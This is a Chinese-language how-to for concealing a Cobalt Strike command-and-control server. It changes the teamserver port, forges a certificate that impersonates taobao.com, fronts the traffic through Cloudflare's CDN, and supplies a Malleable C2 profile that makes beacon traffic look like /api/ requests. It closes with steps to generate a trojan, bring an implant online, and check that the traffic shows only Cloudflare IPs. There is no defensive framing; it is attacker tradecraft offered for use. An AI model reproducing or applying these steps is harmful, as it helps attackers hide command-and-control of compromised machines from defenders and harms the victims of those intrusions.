1. 修改端口特征
vim teamserver
将默认端口修改:
-Dcobaltstrike.server_port=54321
2. 修改证书特征
删除原有证书(第一次启动会生成cobaltstrike.store),创建新证书cobaltstrike.store
rm cobaltstrike.store
keytool -keystore cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias taobao.com -dname "CN=US, OU=”taobao.com“, O=“Sofatest”, L=Beijing, ST=Cyberspace, C=CN"
keytool -importkeystore -srckeystore cobaltstrike.store -destkeystore cobaltstrike.store -deststoretype pkcs12
keytool -list -v -keystore cobaltstrike.store
2. 配置CDN
这里使用cloudflare的CDN。
- 添加A记录
- 添加C记录(可选)
- 在购买域名的站点上将域名服务器更改为CloudFlare的域名服务器
- 打开AlwaysOnline和开发者模式
3. 生成自定义配置文件
cs.profile:
#default Beacon sleep duration and jitter
set sleeptime "5000";
set jitter "20";
https-certificate {
set keystore "cobaltstrike.store";
set password "123456";
}
http-stager {
set uri_x86 "/api/1";
set uri_x64 "/api/2";
client {
header "Host" "xxx.xxxx.tk";}
server {
output{
print;
}
}
}
http-get {
set uri "/api/3";
client {
header "Host" "xxx.xxxx.tk";
metadata {
base64;
header "Cookie";
}
}
server {
output{
print;
}
}
}
http-post {
set uri "/api/4";
client {
header "Host" "xxx.xxxx.tk";
id {
uri-append;
}
output{
print;
}
}
server {
output{
print;
}
}
}
4. 效果演示
启动服务端
./teamserver xx.xx.xx.xx Password cs.profile
-
创建http监听器
CloudFlare CDN支持的http端口:80,8080,8880,2052,2082,2086,2098。
-
生成木马
-
上线
-
查看流量发现目的ip为cloudflare的cdn服务器